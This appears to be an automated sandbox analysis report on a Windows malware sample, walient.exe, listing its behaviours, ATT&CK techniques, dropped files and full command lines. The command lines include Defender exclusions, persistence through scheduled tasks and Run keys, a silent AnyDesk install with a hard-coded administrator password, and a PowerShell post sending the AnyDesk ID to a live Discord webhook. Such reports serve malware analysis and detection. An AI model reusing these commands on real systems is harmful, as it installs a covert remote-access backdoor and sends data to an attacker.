af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f

Analysis

max time kernel
123s
max time network
122s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
04-07-2024 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

walient.exe
Size

121KB
MD5

5c76d15a7d3f57f26edc494bd9db318b
SHA1

cfa089d8d7e9fde67b6cb85827d33431b2d80066
SHA256

af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f
SHA512

3d7a621dcb56a8d8ded08e49c34c77071bcb8e8f408acd2ec9c00ff887342d1e3be935f3ad56b33ef7a96d0d85e1e36b6cccc9498a2b0fe96dab7b5d5747c1fb
SSDEEP

3072:0ojAQkj90n5EIrHshi+LFUWHnGWdw8OkG2Li0HbovOm:YjWnSeGisFXnJw8Ziib

Score

10^/10

defense_evasion discovery execution persistence privilege_escalation

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://download.anydesk.com/AnyDesk.exe

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 3100 powershell.exe
41 4564 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1008 powershell.exe
976 powershell.exe
4744 powershell.exe
1436 powershell.exe
4564 powershell.exe
3100 powershell.exe
3624 powershell.exe

flow	pid	process
4	3100	powershell.exe
41	4564	powershell.exe

Drops startup file 2 IoCs

Processes:

walient.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk	walient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk	walient.exe

Executes dropped EXE 10 IoCs

Processes:

System32.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeSystem32.exe

pid process

1640 System32.exe
3948 AnyDesk.exe
3376 AnyDesk.exe
1912 AnyDesk.exe
3384 AnyDesk.exe
4920 AnyDesk.exe
1332 AnyDesk.exe
832 AnyDesk.exe
1092 AnyDesk.exe
2656 System32.exe

pid	process
1640	System32.exe
3948	AnyDesk.exe
3376	AnyDesk.exe
1912	AnyDesk.exe
3384	AnyDesk.exe
4920	AnyDesk.exe
1332	AnyDesk.exe
832	AnyDesk.exe
1092	AnyDesk.exe
2656	System32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

walient.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\System32.exe"	walient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AnyDesk = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --silent"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

7 discord.com
41 discord.com

flow	ioc
7	discord.com
41	discord.com

Drops file in System32 directory 15 IoCs

Processes:

AnyDesk.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	AnyDesk.exe

Drops file in Program Files directory 2 IoCs

Processes:

AnyDesk.exe

description ioc process

File created C:\Program Files (x86)\AnyDesk\AnyDesk.exe AnyDesk.exe
File opened for modification C:\Program Files (x86)\AnyDesk\AnyDesk.exe AnyDesk.exe
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
defense_evasion privilege_escalation

Create Process with Token
T1134.002

Processes:

powershell.exe

pid process

3624 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

2840 timeout.exe
3372 timeout.exe
1772 timeout.exe
2372 timeout.exe

description	ioc	process
File created	C:\Program Files (x86)\AnyDesk\AnyDesk.exe	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\AnyDesk\AnyDesk.exe	AnyDesk.exe

pid	process
3624	powershell.exe

pid	process
2840	timeout.exe
3372	timeout.exe
1772	timeout.exe
2372	timeout.exe

Modifies registry class 16 IoCs

Processes:

AnyDesk.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\""	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0"	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	AnyDesk.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3288 schtasks.exe
4116 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

AnyDesk.exe

pid process

4920 AnyDesk.exe

pid	process
3288	schtasks.exe
4116	schtasks.exe

pid	process
4920	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exewalient.exepowershell.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exepowershell.exepowershell.exe

pid	process
1008	powershell.exe
1008	powershell.exe
976	powershell.exe
976	powershell.exe
4744	powershell.exe
4744	powershell.exe
1436	powershell.exe
1436	powershell.exe
960	walient.exe
3100	powershell.exe
3100	powershell.exe
3376	AnyDesk.exe
3376	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3948	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
1332	AnyDesk.exe
1332	AnyDesk.exe
3624	powershell.exe
3624	powershell.exe
4564	powershell.exe
4564	powershell.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe
3384	AnyDesk.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

walient.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem32.exepowershell.exepowershell.exeAnyDesk.exeAUDIODG.EXESystem32.exe

description	pid	process
Token: SeDebugPrivilege	960	walient.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	960	walient.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	1640	System32.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	3384	AnyDesk.exe
Token: SeDebugPrivilege	3384	AnyDesk.exe
Token: SeDebugPrivilege	3384	AnyDesk.exe
Token: SeAssignPrimaryTokenPrivilege	3384	AnyDesk.exe
Token: 33	3428	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3428	AUDIODG.EXE
Token: SeDebugPrivilege	2656	System32.exe

Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

AnyDesk.exeAnyDesk.exe

pid process

1912 AnyDesk.exe
1912 AnyDesk.exe
1912 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
Suspicious use of SendNotifyMessage 11 IoCs

Processes:

AnyDesk.exeAnyDesk.exe

pid process

1912 AnyDesk.exe
1912 AnyDesk.exe
1912 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
4920 AnyDesk.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

walient.exeAnyDesk.exe

pid process

960 walient.exe
1092 AnyDesk.exe
1092 AnyDesk.exe

pid	process
1912	AnyDesk.exe
1912	AnyDesk.exe
1912	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe

pid	process
1912	AnyDesk.exe
1912	AnyDesk.exe
1912	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe
4920	AnyDesk.exe

pid	process
960	walient.exe
1092	AnyDesk.exe
1092	AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

walient.execmd.exeAnyDesk.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 960 wrote to memory of 1008	960	walient.exe	powershell.exe
PID 960 wrote to memory of 1008	960	walient.exe	powershell.exe
PID 960 wrote to memory of 976	960	walient.exe	powershell.exe
PID 960 wrote to memory of 976	960	walient.exe	powershell.exe
PID 960 wrote to memory of 4744	960	walient.exe	powershell.exe
PID 960 wrote to memory of 4744	960	walient.exe	powershell.exe
PID 960 wrote to memory of 1436	960	walient.exe	powershell.exe
PID 960 wrote to memory of 1436	960	walient.exe	powershell.exe
PID 960 wrote to memory of 3288	960	walient.exe	schtasks.exe
PID 960 wrote to memory of 3288	960	walient.exe	schtasks.exe
PID 960 wrote to memory of 1376	960	walient.exe	cmd.exe
PID 960 wrote to memory of 1376	960	walient.exe	cmd.exe
PID 1376 wrote to memory of 3100	1376	cmd.exe	powershell.exe
PID 1376 wrote to memory of 3100	1376	cmd.exe	powershell.exe
PID 1376 wrote to memory of 2372	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 2372	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 3948	1376	cmd.exe	AnyDesk.exe
PID 1376 wrote to memory of 3948	1376	cmd.exe	AnyDesk.exe
PID 1376 wrote to memory of 3948	1376	cmd.exe	AnyDesk.exe
PID 3948 wrote to memory of 3376	3948	AnyDesk.exe	AnyDesk.exe
PID 3948 wrote to memory of 3376	3948	AnyDesk.exe	AnyDesk.exe
PID 3948 wrote to memory of 3376	3948	AnyDesk.exe	AnyDesk.exe
PID 3948 wrote to memory of 1912	3948	AnyDesk.exe	AnyDesk.exe
PID 3948 wrote to memory of 1912	3948	AnyDesk.exe	AnyDesk.exe
PID 3948 wrote to memory of 1912	3948	AnyDesk.exe	AnyDesk.exe
PID 1376 wrote to memory of 2840	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 2840	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 5040	1376	cmd.exe	cmd.exe
PID 1376 wrote to memory of 5040	1376	cmd.exe	cmd.exe
PID 1376 wrote to memory of 1332	1376	cmd.exe	AnyDesk.exe
PID 1376 wrote to memory of 1332	1376	cmd.exe	AnyDesk.exe
PID 1376 wrote to memory of 1332	1376	cmd.exe	AnyDesk.exe
PID 1376 wrote to memory of 3372	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 3372	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 768	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 768	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1772	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 1772	1376	cmd.exe	timeout.exe
PID 1376 wrote to memory of 3624	1376	cmd.exe	powershell.exe
PID 1376 wrote to memory of 3624	1376	cmd.exe	powershell.exe
PID 1376 wrote to memory of 1372	1376	cmd.exe	net.exe
PID 1376 wrote to memory of 1372	1376	cmd.exe	net.exe
PID 1372 wrote to memory of 3492	1372	net.exe	net1.exe
PID 1372 wrote to memory of 3492	1372	net.exe	net1.exe
PID 1376 wrote to memory of 3240	1376	cmd.exe	net.exe
PID 1376 wrote to memory of 3240	1376	cmd.exe	net.exe
PID 3240 wrote to memory of 3368	3240	net.exe	net1.exe
PID 3240 wrote to memory of 3368	3240	net.exe	net1.exe
PID 1376 wrote to memory of 3936	1376	cmd.exe	net.exe
PID 1376 wrote to memory of 3936	1376	cmd.exe	net.exe
PID 3936 wrote to memory of 4616	3936	net.exe	net1.exe
PID 3936 wrote to memory of 4616	3936	net.exe	net1.exe
PID 1376 wrote to memory of 3728	1376	cmd.exe	net.exe
PID 1376 wrote to memory of 3728	1376	cmd.exe	net.exe
PID 3728 wrote to memory of 3404	3728	net.exe	net1.exe
PID 3728 wrote to memory of 3404	3728	net.exe	net1.exe
PID 1376 wrote to memory of 2424	1376	cmd.exe	net.exe
PID 1376 wrote to memory of 2424	1376	cmd.exe	net.exe
PID 2424 wrote to memory of 2704	2424	net.exe	net1.exe
PID 2424 wrote to memory of 2704	2424	net.exe	net1.exe
PID 1376 wrote to memory of 4116	1376	cmd.exe	schtasks.exe
PID 1376 wrote to memory of 4116	1376	cmd.exe	schtasks.exe
PID 1376 wrote to memory of 4900	1376	cmd.exe	cmd.exe
PID 1376 wrote to memory of 4900	1376	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\walient.exe
"C:\Users\Admin\AppData\Local\Temp\walient.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\walient.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'walient.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System32.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System32.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System32" /tr "C:\Users\Admin\System32.exe"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\System32.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://download.anydesk.com/AnyDesk.exe', 'C:\AnyDesk.exe')"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3100

C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2372

C:\AnyDesk.exe
"C:\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --silent --update-auto
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3948

C:\AnyDesk.exe
"C:\AnyDesk.exe" --local-service
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3376

C:\AnyDesk.exe
"C:\AnyDesk.exe" --local-control
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 7 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Itsm3g#no "
3⤵
PID:5040

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk/AnyDesk.exe" --set-password
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1332

C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
3⤵
- Delays execution with timeout.exe
PID:3372

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AnyDesk" /t REG_SZ /d "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\" --silent" /f
3⤵
- Adds Run key to start application
PID:768

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers' -Name 'C:\Program Files (x86)\AnyDesk\AnyDesk.exe' -Value 'RUNASADMIN'"
3⤵
- Command and Scripting Interpreter: PowerShell
- Access Token Manipulation: Create Process with Token
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\system32\net.exe
net localgroup Administrators Admin /delete
3⤵
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators Admin /delete
4⤵
PID:3492

C:\Windows\system32\net.exe
net localgroup Administrators /delete
3⤵
- Suspicious use of WriteProcessMemory
PID:3240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators /delete
4⤵
PID:3368

C:\Windows\system32\net.exe
net localgroup Administrators Administrator /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators Administrator /add
4⤵
PID:4616

C:\Windows\system32\net.exe
net user Administrator Itsm3g#no
3⤵
- Suspicious use of WriteProcessMemory
PID:3728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Administrator Itsm3g#no
4⤵
PID:3404

C:\Windows\system32\net.exe
net user Administrator /active:yes
3⤵
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Administrator /active:yes
4⤵
PID:2704

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Booter" /tr "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\"" /sc onstart /ru system /rl highest
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id
3⤵
PID:4900

C:\Windows\system32\cmd.exe
cmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id
4⤵
PID:4620

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --get-id
5⤵
- Executes dropped EXE
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$body = @{ content = 'AnyDesk ID is: \"1363826712\"' }; Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1258511169841532991/GrwPZfm9ekTr7GHjmdDSwad-g2UoAbt-DvGuyTG8kPXJ9PK0sGzxcyCmHj39cK_JV3sc' -Method Post -ContentType 'application/json' -Body ($body | ConvertTo-Json)"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\System32.exe
C:\Users\Admin\System32.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --backend
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1092

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4920

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Users\Admin\System32.exe
C:\Users\Admin\System32.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Scheduled Task/Job

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\AnyDesk.exe
Filesize
5.1MB

MD5
aee6801792d67607f228be8cec8291f9

SHA1
bf6ba727ff14ca2fddf619f292d56db9d9088066

SHA256
1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499

SHA512
09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
e0f56b88aacb294d6be47f7bcb51c555

SHA1
98ebaf991f66ae9f94a50caafd339828492042ab

SHA256
064e3179c548a409a9fb0ba220585d4bcd516a47d908f3d1e8f40b8377d05e02

SHA512
13e026642c61f7599854f2fd453eae01a37158d45dc0676ed5df7f2e15629c879efcd64aab6a52d58a44b226b8cb64bf1804b823a0d9d93d63266d190509c1d4

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
3KB

MD5
0cfcdc7661a3f3de7bb713e731b6bff0

SHA1
3a763fa6ed368c24729db9478880196f6e106786

SHA256
19632eae1746330970b64ff8cc879bff75ff82934c29911ea56ea923ea9d1e60

SHA512
b94f5dc43a6a9320ffafd0dc8918086d1eb738f2f73e66cff80d26950cc8c81250b00582ea3846d89f38bf82b98dc3cc005d99dee4afd55bd7b6611fbdcacc80

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
370B

MD5
afdc4f69f4720b8c4153f6186f49a2b6

SHA1
329c27ea36d7913809b0c239bb58e91d2ee468ac

SHA256
9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

SHA512
3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
f4e4265aba4f725aa5f6b108a6f8c1e5

SHA1
e24a6ebde2a690e97491c02f513c3245592f2eac

SHA256
eefc386a9572e1ddea0d7476e8b3b2d70fc08f0c71467eb24ddb71cadf0906ef

SHA512
854cb14a678112c7dce785b0353dff8f11680194138e1e2a319cc8da880c9484b0d64fcbe5c41016d33f5e9eccff89f9563ec21fa7b274406b2359341d266970

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
690B

MD5
620262eb2949dc87256a53b76f9db2f2

SHA1
